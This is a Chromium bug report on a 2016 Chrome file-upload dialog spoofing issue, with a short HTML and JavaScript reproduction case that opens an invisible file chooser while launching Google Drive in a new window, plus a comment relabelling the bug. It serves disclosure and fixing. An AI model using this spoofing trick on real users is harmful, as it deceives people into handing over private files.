VULNERABILITY DETAILS
The dialogue that opens to upload files can be made to seem as if it's opening from a trusted domain by triggering it to open at the same time as opening a new URL. A potential victim can be tricked into disclosing private files.
VERSION
Chrome Version: 52.0.2743.116 m (64-bit) + Stable
Operating System: Windows 8.1 64bit
REPRODUCTION CASE
------------------------------------
<style>
#q{opacity:0.0;}
</style>
<input type="file" id="q"/>
<button id="qbutt">Click me</button>
<script>
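var pop;
// One user click runs both actions in the same handler.
qbutt.onclick = function () {
  q.click(); // opens the file chooser for the invisible (opacity 0) input
  pop = open('https://drive.google.com/drive/my-drive', 123); // opens the trusted URL in a new window at the same time
};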
</script>
-----------------------------------
Comment 1 by och...@chromium.org, Aug 15 2016
Labels: -Type-Bug-Security -Restrict-View-SecurityTeam Type-Bug